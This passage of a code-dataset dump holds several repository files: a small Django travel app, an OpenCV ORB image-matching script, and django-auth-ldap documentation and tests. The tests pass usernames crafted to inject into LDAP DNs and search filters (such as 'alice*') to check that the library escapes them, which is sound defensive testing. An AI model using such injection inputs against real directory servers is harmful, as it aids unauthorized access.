\"Categorias\"\n\n\t#Attributes\n\tcategoria = models.CharField(max_length = 100, blank = False)\n\n\tdef __str__(self):\n\t\treturn self.categoria" }, { "alpha_fraction": 0.7084547877311707, "alphanum_fraction": 0.7084547877311707, "avg_line_length": 21.733333587646484, "blob_id": "1a37ec8bbb0ef04726320c8e0ca06cc61867dd5d", "content_id": "6e5702f85f9cecbc5128a3686be431b61a3a427b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 343, "license_type": "no_license", "max_line_length": 59, "num_lines": 15, "path": "/project/aerolinea/views.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom .models import *\n\n# Create your views here.\ndef vuelos(request):\n\n\tvuelo = Vuelo.object.all()\n\tvuelos = {}\n\t\n\tfor x in vuelo:\n\t\taerolinea = x.aerolinea.nombre\n\t\tdestino = x.destino.nombre\n\t\tvuelos.setdefault(aerolinea, []).append(destino)\n\n\treturn render(request, 'vuelos.html', {'vuelos' : vuelos})\n\n\t" }, { "alpha_fraction": 0.7243243455886841, "alphanum_fraction": 0.7243243455886841, "avg_line_length": 25.571428298950195, "blob_id": "425029f6fb3e247cc9922565d671033201bb1e10", "content_id": "ce90bb7a78fe532ae818f9786d2728cf1459055c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 185, "license_type": "no_license", "max_line_length": 54, "num_lines": 7, "path": "/project/destino/views.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom .models import *\n\n# Create your views here.\ndef index(request):\n\td = Destino.mexico.all()\n\treturn render(request, 'index.html', 
{'destino' : d})" } ]
num_files: 14
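The models.py files in the row above define custom managers, but two details would trip Django up: the ORM only ever calls get_queryset(), so overriding a method named queryset() is never picked up, and range filters use the double-underscore lookup (rating__gt=2, not rating_gt=2). A minimal sketch of the conventional manager pattern, using stand-in model and manager names rather than the row's own:

```python
from django.db import models


class ActiveManager(models.Manager):
    # Django calls get_queryset(); a method named queryset() has no effect.
    def get_queryset(self):
        return super().get_queryset().filter(is_active=True)


class TopRatedManager(models.Manager):
    def get_queryset(self):
        # Range lookups use the double-underscore syntax: rating__gt.
        return super().get_queryset().filter(rating__gt=2)


class Destination(models.Model):
    name = models.CharField(max_length=100)
    rating = models.IntegerField(default=5)
    is_active = models.BooleanField(default=True)

    objects = models.Manager()      # default manager
    active = ActiveManager()        # Destination.active.all()
    top_rated = TopRatedManager()   # Destination.top_rated.all()
```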
repo_name: RahulDevadiga/Key-point-matching-Image-Processing
repo_url: https://github.com/RahulDevadiga/Key-point-matching-Image-Processing
snapshot_id: 149e4449278fd830b323c0796ad06ad67ce3042a
revision_id: 4a1c633231503f7532dea7840fe8752430b57e27
directory_id: b6ea99aa7276e8ae6f2d1675045f964306ffcaf3
branch_name: refs/heads/master
visit_date: 2021-05-21T00:48:28.059144
revision_date: 2020-04-02T14:48:59
committer_date: 2020-04-02T14:48:59
github_id: 252,474,623
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
[ { "alpha_fraction": 0.8009389638900757, "alphanum_fraction": 0.8009389638900757, "avg_line_length": 80.92308044433594, "blob_id": "f08ca2e1417677bd37c944d7f3cb5e06983e94d0", "content_id": "35e95681f93727b9d6ef48fc8a3e637f2c0db7ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1065, "license_type": "no_license", "max_line_length": 283, "num_lines": 13, "path": "/README.md", "repo_name": "RahulDevadiga/Key-point-matching-Image-Processing", "src_encoding": "UTF-8", "text": "# Key-point-matching-Image-Processing\nGiven two images, it matches key points in the image and finds the average distance between those images.\n\n## ORB \nORB is basically a fusion of FAST keypoint detector and BRIEF descriptor with many modifications to enhance the performance. First it use FAST to find keypoints, then apply Harris corner measure to find top N points among them. It also uses a pyramid to produce multiscale-features. \nIt can be extended to detect an object in the image and can also be used to find the image which is closest to the given set of images\n\n\n# Following is the output of some of the images\n![Football](https://github.com/RahulDevadiga/Key-point-matching-Image-Processing/blob/master/output/fb.PNG)\n![HCV](https://github.com/RahulDevadiga/Key-point-matching-Image-Processing/blob/master/output/hcv.png)\n![Raspberry Pi](https://github.com/RahulDevadiga/Key-point-matching-Image-Processing/blob/master/output/raspberry.PNG)\n![Ronaldo](https://github.com/RahulDevadiga/Key-point-matching-Image-Processing/blob/master/output/ronaldo.PNG)\n" }, { "alpha_fraction": 0.6417021155357361, "alphanum_fraction": 0.7012766003608704, "avg_line_length": 25.5238094329834, "blob_id": "9f08dab991028fc9a240ce204b421418a1f6207d", "content_id": "f6e9dea4f06c578ebba62885db17051115d0720f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1175, "license_type": "no_license", "max_line_length": 98, "num_lines": 42, "path": "/temp_match_sim.py", "repo_name": "RahulDevadiga/Key-point-matching-Image-Processing", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\nimport os\nimport time\n\n#input images to be compared \nimg1='img/ron1.jpg'\nimg2='img/ron2.jpg'\n\n#orb oriented fast and rotated brief\norb = cv2.ORB_create()\n\nimg1 = cv2.imread(img1,0)\nimg2 = cv2.imread(img2,0)\n\t\nimg1 = cv2.resize(img1, (600,600), interpolation = cv2.INTER_AREA)\nimg2 = cv2.resize(img2, (600,600), interpolation = cv2.INTER_AREA)\n\t\t\n#to find key points and descriptors for each image\nkp1, des1 = orb.detectAndCompute(img1,None)\nkp2, des2 = orb.detectAndCompute(img2,None)\n\nbf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True) #crosscheck is true will give best matching\n\nmatches = bf.match(des1,des2)\nmatches = sorted(matches,key=lambda x:x.distance)\n\t\t\ntop=5\n#to show the output image\nmatchimg = cv2.drawMatches(img1, kp1, img2, kp2, matches[:top], None)\n#to find the distance between images \nsums=0\nfor m in matches:\n\tsums+=m.distance\nimg3 = cv2.resize(matchimg, (1200,600), interpolation = cv2.INTER_AREA)\ncv2.imshow(\"img3\",img3)\ncv2.imwrite(\"op.png\", img3)\n\nprint(\"average distance of first and second image is \",sums/top)\n\t\ncv2.waitKey(0)\ncv2.destroyAllWindows(0)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" } ]
num_files: 2
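The README in the row above notes that ORB matching can also be used to find, from a set of candidates, the image closest to a query image. A minimal sketch of that extension built from the same calls the row's script already uses (cv2.ORB_create, BFMatcher with NORM_HAMMING); the candidate paths are placeholders, and where the row's script sums every match distance but divides by the fixed top-5 count, this sketch averages over the top matches it actually keeps:

```python
import cv2

def average_orb_distance(query_path, candidate_path, top=5):
    # Grayscale load, as in the row's script.
    img1 = cv2.imread(query_path, cv2.IMREAD_GRAYSCALE)
    img2 = cv2.imread(candidate_path, cv2.IMREAD_GRAYSCALE)

    orb = cv2.ORB_create()
    _, des1 = orb.detectAndCompute(img1, None)
    _, des2 = orb.detectAndCompute(img2, None)

    # Hamming norm with cross-check, matching the original settings.
    bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
    matches = sorted(bf.match(des1, des2), key=lambda m: m.distance)[:top]
    if not matches:
        return float("inf")
    return sum(m.distance for m in matches) / len(matches)

# Placeholder candidate list: the best match has the smallest average distance.
candidates = ["img/ron2.jpg", "img/other.jpg"]
closest = min(candidates, key=lambda p: average_orb_distance("img/ron1.jpg", p))
print(closest)
```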
repo_name: django-auth-ldap/django-auth-ldap
repo_url: https://github.com/django-auth-ldap/django-auth-ldap
snapshot_id: 9c6abd3d52b8332ae184c6152011840a12c46503
revision_id: 1008d9fe16c0e6cfe3c9ad3b84e190204b182749
directory_id: 5fb5290306c2725240aa47ae75b7310c50cd0479
branch_name: refs/heads/master
visit_date: 2023-08-17T16:27:45.890091
revision_date: 2023-08-08T15:28:22
committer_date: 2023-08-08T15:32:24
github_id: 126,738,464
star_events_count: 322
fork_events_count: 109
gha_license_id: BSD-2-Clause
gha_created_at: 2018-03-25T20:43:34
gha_updated_at: 2023-09-02T01:13:26
gha_pushed_at: 2023-09-05T08:36:14
gha_language: Python
[ { "alpha_fraction": 0.676554262638092, "alphanum_fraction": 0.6781796216964722, "avg_line_length": 35.19117736816406, "blob_id": "5b63c0e15b5d2103dd4e43b364b0834231c4b91a", "content_id": "8744e0b6c26e4418b52a8369874c578d1d908758", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2461, "license_type": "permissive", "max_line_length": 80, "num_lines": 68, "path": "/docs/example.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Example Configuration\n=====================\n\nHere is a complete example configuration from :file:`settings.py` that\nexercises nearly all of the features. In this example, we're authenticating\nagainst a global pool of users in the directory, but we have a special area set\naside for Django groups (``ou=django,ou=groups,dc=example,dc=com``). Remember\nthat most of this is optional if you just need simple authentication. Some\ndefault settings and arguments are included for completeness.\n\n.. code-block:: python\n\n import ldap\n from django_auth_ldap.config import LDAPSearch, GroupOfNamesType\n\n\n # Baseline configuration.\n AUTH_LDAP_SERVER_URI = \"ldap://ldap.example.com\"\n\n AUTH_LDAP_BIND_DN = \"cn=django-agent,dc=example,dc=com\"\n AUTH_LDAP_BIND_PASSWORD = \"phlebotinum\"\n AUTH_LDAP_USER_SEARCH = LDAPSearch(\n \"ou=users,dc=example,dc=com\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n # Or:\n # AUTH_LDAP_USER_DN_TEMPLATE = 'uid=%(user)s,ou=users,dc=example,dc=com'\n\n # Set up the basic group parameters.\n AUTH_LDAP_GROUP_SEARCH = LDAPSearch(\n \"ou=django,ou=groups,dc=example,dc=com\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n )\n AUTH_LDAP_GROUP_TYPE = GroupOfNamesType(name_attr=\"cn\")\n\n # Simple group restrictions\n AUTH_LDAP_REQUIRE_GROUP = \"cn=enabled,ou=django,ou=groups,dc=example,dc=com\"\n AUTH_LDAP_DENY_GROUP = \"cn=disabled,ou=django,ou=groups,dc=example,dc=com\"\n\n # Populate the Django user from the LDAP directory.\n AUTH_LDAP_USER_ATTR_MAP = {\n \"first_name\": \"givenName\",\n \"last_name\": \"sn\",\n \"email\": \"mail\",\n }\n\n AUTH_LDAP_USER_FLAGS_BY_GROUP = {\n \"is_active\": \"cn=active,ou=django,ou=groups,dc=example,dc=com\",\n \"is_staff\": \"cn=staff,ou=django,ou=groups,dc=example,dc=com\",\n \"is_superuser\": \"cn=superuser,ou=django,ou=groups,dc=example,dc=com\",\n }\n\n # This is the default, but I like to be explicit.\n AUTH_LDAP_ALWAYS_UPDATE_USER = True\n\n # Use LDAP group membership to calculate group permissions.\n AUTH_LDAP_FIND_GROUP_PERMS = True\n\n # Cache distinguished names and group memberships for an hour to minimize\n # LDAP traffic.\n AUTH_LDAP_CACHE_TIMEOUT = 3600\n\n # Keep ModelBackend around for per-user permissions and maybe a local\n # superuser.\n AUTHENTICATION_BACKENDS = (\n \"django_auth_ldap.backend.LDAPBackend\",\n \"django.contrib.auth.backends.ModelBackend\",\n )\n" }, { "alpha_fraction": 0.5798587203025818, "alphanum_fraction": 0.5815887451171875, "avg_line_length": 35.95307922363281, "blob_id": "6f3fd99b93b860d2aba3502cd7a5eddf43927b7c", "content_id": "326bcabcec6245718a21368ff194fbed4243d6f0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 63010, "license_type": "permissive", "max_line_length": 88, "num_lines": 1705, "path": "/tests/tests.py", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "# Copyright (c) 2009, Peter Sagerson\n# All rights 
reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# - Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# - Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport contextlib\nimport functools\nimport logging\nimport os\nimport pickle\nfrom copy import deepcopy\nfrom unittest import mock\n\nimport ldap\nimport slapdtest\nfrom django.contrib.auth import authenticate, get_backends\nfrom django.contrib.auth.models import Group, Permission, User\nfrom django.core.cache import cache\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\nfrom django.test.utils import override_settings\n\nfrom django_auth_ldap.backend import LDAPBackend, ldap_error, populate_user\nfrom django_auth_ldap.config import (\n GroupOfNamesType,\n LDAPGroupQuery,\n LDAPSearch,\n LDAPSearchUnion,\n MemberDNGroupType,\n NestedMemberDNGroupType,\n PosixGroupType,\n)\n\nfrom .models import TestUser\n\n\ndef get_backend():\n backends = get_backends()\n return backends[0]\n\n\ndef _override_settings(**settings):\n def decorator(func):\n @functools.wraps(func)\n def wrapped_test(self, *args, **kwargs):\n cm = override_settings(**settings)\n cm.enable()\n self.addCleanup(cm.disable)\n return func(self, *args, **kwargs)\n\n return wrapped_test\n\n return decorator\n\n\ndef spy_ldap(name):\n \"\"\"\n Patch the python-ldap method. 
The patched method records all calls and\n passes execution to the original method.\n \"\"\"\n ldap_method = getattr(ldap.ldapobject.SimpleLDAPObject, name)\n ldap_mock = mock.MagicMock()\n\n @functools.wraps(ldap_method)\n def wrapped_ldap_method(self, *args, **kwargs):\n ldap_mock(*args, **kwargs)\n return ldap_method(self, *args, **kwargs)\n\n def decorator(test):\n @functools.wraps(test)\n def wrapped_test(self, *args, **kwargs):\n with mock.patch.object(\n ldap.ldapobject.SimpleLDAPObject, name, wrapped_ldap_method\n ):\n return test(self, ldap_mock, *args, **kwargs)\n\n return wrapped_test\n\n return decorator\n\n\[email protected]\ndef catch_signal(signal):\n \"\"\"Catch Django signal and return the mocked call.\"\"\"\n handler = mock.Mock()\n signal.connect(handler)\n try:\n yield handler\n finally:\n signal.disconnect(handler)\n\n\nclass LDAPTest(TestCase):\n @classmethod\n def configure_logger(cls):\n logger = logging.getLogger(\"django_auth_ldap\")\n formatter = logging.Formatter(\"LDAP auth - %(levelname)s - %(message)s\")\n handler = logging.StreamHandler()\n\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n logger.setLevel(logging.CRITICAL)\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.configure_logger()\n\n here = os.path.dirname(__file__)\n cls.server = slapdtest.SlapdObject()\n cls.server.suffix = \"o=test\"\n cls.server.openldap_schema_files = [\n \"core.ldif\",\n \"cosine.ldif\",\n \"inetorgperson.ldif\",\n \"nis.ldif\",\n \"msuser.ldif\",\n ]\n cls.server.start()\n with open(os.path.join(here, \"tests.ldif\")) as fp:\n ldif = fp.read()\n cls.server.slapadd(ldif)\n\n @classmethod\n def tearDownClass(cls):\n cls.server.stop()\n super().tearDownClass()\n\n def setUp(self):\n super().setUp()\n cache.clear()\n\n def test_options(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n CONNECTION_OPTIONS={ldap.OPT_REFERRALS: 0},\n )\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(user.ldap_user.connection.get_option(ldap.OPT_REFERRALS), 0)\n\n def test_callable_server_uri(self):\n request = RequestFactory().get(\"/\")\n cb_mock = mock.Mock(return_value=self.server.ldap_uri)\n\n self._init_settings(\n SERVER_URI=lambda request: cb_mock(request),\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n )\n user_count = User.objects.count()\n\n user = authenticate(request=request, username=\"alice\", password=\"password\")\n\n self.assertIs(user.has_usable_password(), False)\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(User.objects.count(), user_count + 1)\n cb_mock.assert_called_with(request)\n\n def test_simple_bind(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n user_count = User.objects.count()\n\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n user = authenticate(username=\"alice\", password=\"password\")\n self.assertIs(user.has_usable_password(), False)\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(User.objects.count(), user_count + 1)\n self.assertEqual(\n [(log.msg, log.args) for log in logs.records],\n [\n (\"Binding as %s\", (\"uid=alice,ou=people,o=test\",)),\n (\"Creating Django user %s\", (\"alice\",)),\n (\"Populating Django user %s\", (\"alice\",)),\n ],\n )\n\n def test_default_settings(self):\n class MyBackend(LDAPBackend):\n default_settings = {\n \"SERVER_URI\": self.server.ldap_uri,\n \"USER_DN_TEMPLATE\": 
\"uid=%(user)s,ou=people,o=test\",\n }\n\n backend = MyBackend()\n\n user_count = User.objects.count()\n\n user = backend.authenticate(None, username=\"alice\", password=\"password\")\n\n self.assertIs(user.has_usable_password(), False)\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(User.objects.count(), user_count + 1)\n\n @_override_settings(\n AUTHENTICATION_BACKENDS=[\n \"django_auth_ldap.backend.LDAPBackend\",\n \"django.contrib.auth.backends.ModelBackend\",\n ]\n )\n def test_login_with_multiple_auth_backends(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n user = authenticate(username=\"alice\", password=\"password\")\n self.assertIsNotNone(user)\n\n @_override_settings(\n AUTHENTICATION_BACKENDS=[\n \"django_auth_ldap.backend.LDAPBackend\",\n \"django.contrib.auth.backends.ModelBackend\",\n ]\n )\n def test_bad_login_with_multiple_auth_backends(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n user = authenticate(username=\"invalid\", password=\"i_do_not_exist\")\n self.assertIsNone(user)\n\n def test_username_none(self):\n self._init_settings()\n user = authenticate(username=None, password=\"password\")\n self.assertIsNone(user)\n\n @spy_ldap(\"simple_bind_s\")\n def test_simple_bind_escaped(self, mock):\n \"\"\"Bind with a username that requires escaping.\"\"\"\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n user = authenticate(username=\"alice,1\", password=\"password\")\n\n self.assertIsNone(user)\n mock.assert_called_once_with(\"uid=alice\\\\,1,ou=people,o=test\", \"password\")\n\n def test_new_user_lowercase(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n user_count = User.objects.count()\n\n user = authenticate(username=\"Alice\", password=\"password\")\n\n self.assertIs(user.has_usable_password(), False)\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(User.objects.count(), user_count + 1)\n\n def test_deepcopy(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n user = authenticate(username=\"Alice\", password=\"password\")\n user = deepcopy(user)\n\n @_override_settings(AUTH_USER_MODEL=\"tests.TestUser\")\n def test_auth_custom_user(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"uid_number\": \"uidNumber\"},\n )\n\n user = authenticate(username=\"Alice\", password=\"password\")\n\n self.assertIsInstance(user, TestUser)\n\n @_override_settings(AUTH_USER_MODEL=\"tests.TestUser\")\n def test_get_custom_user(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"uid_number\": \"uidNumber\"},\n )\n\n backend = get_backend()\n user = authenticate(username=\"Alice\", password=\"password\")\n user = backend.get_user(user.id)\n\n self.assertIsInstance(user, TestUser)\n\n @_override_settings(AUTH_USER_MODEL=\"tests.TestUser\")\n def test_get_custom_field(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"uid_number\": \"uidNumber\"},\n USER_QUERY_FIELD=\"uid_number\",\n )\n alice = TestUser.objects.create(identifier=\"abcdef\", uid_number=1000)\n user = authenticate(username=\"Alice\", password=\"password\")\n self.assertIsInstance(user, TestUser)\n self.assertEqual(user.pk, alice.pk)\n\n def test_new_user_whitespace(self):\n 
self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n user_count = User.objects.count()\n\n user = authenticate(username=\" alice\", password=\"password\")\n user = authenticate(username=\"alice \", password=\"password\")\n\n self.assertIs(user.has_usable_password(), False)\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(User.objects.count(), user_count + 1)\n\n def test_simple_bind_bad_user(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n user_count = User.objects.count()\n\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n user = authenticate(username=\"evil_alice\", password=\"password\")\n self.assertIsNone(user)\n self.assertEqual(User.objects.count(), user_count)\n\n log1, log2 = logs.records\n self.assertEqual(log1.msg, \"Binding as %s\")\n self.assertEqual(log1.args, (\"uid=evil_alice,ou=people,o=test\",))\n self.assertEqual(log2.levelname, \"DEBUG\")\n self.assertEqual(log2.msg, \"Authentication failed for %s: %s\")\n username, exc = log2.args\n self.assertEqual(username, \"evil_alice\")\n self.assertEqual(exc.args, (\"user DN/password rejected by LDAP server.\",))\n\n def test_simple_bind_bad_password(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n user_count = User.objects.count()\n\n user = authenticate(username=\"alice\", password=\"bogus\")\n\n self.assertIsNone(user)\n self.assertEqual(User.objects.count(), user_count)\n\n def test_existing_user(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n User.objects.create(username=\"alice\")\n user_count = User.objects.count()\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n # Make sure we only created one user\n self.assertIsNotNone(user)\n self.assertEqual(User.objects.count(), user_count)\n\n def test_existing_user_insensitive(self):\n base_dn = \"ou=people,o=test\"\n filters = \"(uid=%(user)s)\"\n self._init_settings(\n USER_SEARCH=LDAPSearch(base_dn, ldap.SCOPE_SUBTREE, filters)\n )\n User.objects.create(username=\"alice\")\n\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n user = authenticate(username=\"Alice\", password=\"password\")\n self.assertIsNotNone(user)\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(User.objects.count(), 1)\n\n dn = \"uid=alice,ou=people,o=test\"\n self.assertEqual(\n [(log.msg, log.args) for log in logs.records],\n [\n (\"Binding as %s\", (\"\",)),\n (\"Invoking search_s('%s', %s, '%s')\", (base_dn, 2, \"(uid=Alice)\")),\n (\n \"search_s('%s', %s, '%s') returned %d objects: %s\",\n (base_dn, 2, filters, 1, dn),\n ),\n (\"Binding as %s\", (dn,)),\n (\"Populating Django user %s\", (\"Alice\",)),\n ],\n )\n\n def test_convert_username(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n class MyBackend(LDAPBackend):\n def ldap_to_django_username(self, username):\n return \"ldap_%s\" % username\n\n def django_to_ldap_username(self, username):\n return username[5:]\n\n backend = MyBackend()\n user_count = User.objects.count()\n\n user1 = backend.authenticate(None, username=\"alice\", password=\"password\")\n user2 = backend.get_user(user1.pk)\n\n self.assertEqual(User.objects.count(), user_count + 1)\n self.assertEqual(user1.username, \"ldap_alice\")\n self.assertEqual(user1.ldap_user._username, \"alice\")\n self.assertEqual(user1.ldap_username, \"alice\")\n self.assertEqual(user2.username, \"ldap_alice\")\n 
self.assertEqual(user2.ldap_user._username, \"alice\")\n self.assertEqual(user2.ldap_username, \"alice\")\n\n def test_search_bind(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n user_count = User.objects.count()\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsNotNone(user)\n self.assertEqual(User.objects.count(), user_count + 1)\n\n @spy_ldap(\"search_s\")\n def test_search_bind_escaped(self, mock):\n \"\"\"Search for a username that requires escaping.\"\"\"\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n\n user = authenticate(username=\"alice*\", password=\"password\")\n\n self.assertIsNone(user)\n mock.assert_called_once_with(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=alice\\\\2a)\", None\n )\n\n def test_search_bind_no_user(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uidNumber=%(user)s)\"\n )\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsNone(user)\n\n def test_search_bind_multiple_users(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=*)\")\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsNone(user)\n\n def test_search_bind_bad_password(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n\n user = authenticate(username=\"alice\", password=\"bogus\")\n\n self.assertIsNone(user)\n\n def test_search_bind_with_credentials(self):\n self._init_settings(\n BIND_DN=\"uid=bob,ou=people,o=test\",\n BIND_PASSWORD=\"password\",\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsNotNone(user)\n self.assertIsNotNone(user.ldap_user)\n self.assertEqual(user.ldap_user.dn, \"uid=alice,ou=people,o=test\")\n self.assertEqual(\n dict(user.ldap_user.attrs),\n {\n \"objectClass\": [\n \"person\",\n \"organizationalPerson\",\n \"inetOrgPerson\",\n \"posixAccount\",\n ],\n \"cn\": [\"alice\"],\n \"uid\": [\"alice\"],\n \"userPassword\": [\"password\"],\n \"uidNumber\": [\"1000\"],\n \"gidNumber\": [\"1000\"],\n \"givenName\": [\"Alice\"],\n \"sn\": [\"Adams\"],\n \"homeDirectory\": [\"/home/alice\"],\n },\n )\n\n def test_search_bind_with_bad_credentials(self):\n self._init_settings(\n BIND_DN=\"uid=bob,ou=people,o=test\",\n BIND_PASSWORD=\"bogus\",\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsNone(user)\n\n def test_unicode_user(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n )\n\n user = authenticate(username=\"dreßler\", password=\"password\")\n self.assertIsNotNone(user)\n self.assertEqual(user.username, \"dreßler\")\n self.assertEqual(user.last_name, \"Dreßler\")\n\n def test_cidict(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsInstance(user.ldap_user.attrs, ldap.cidict.cidict)\n\n def test_populate_user(self):\n self._init_settings(\n 
USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(user.first_name, \"Alice\")\n self.assertEqual(user.last_name, \"Adams\")\n\n def test_populate_user_with_missing_attribute(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\n \"first_name\": \"givenName\",\n \"last_name\": \"sn\",\n \"email\": \"mail\",\n },\n )\n\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n user = authenticate(username=\"alice\", password=\"password\")\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(user.first_name, \"Alice\")\n self.assertEqual(user.last_name, \"Adams\")\n self.assertEqual(user.email, \"\")\n dn = \"uid=alice,ou=people,o=test\"\n self.assertEqual(\n [(log.levelname, log.msg, log.args) for log in logs.records],\n [\n 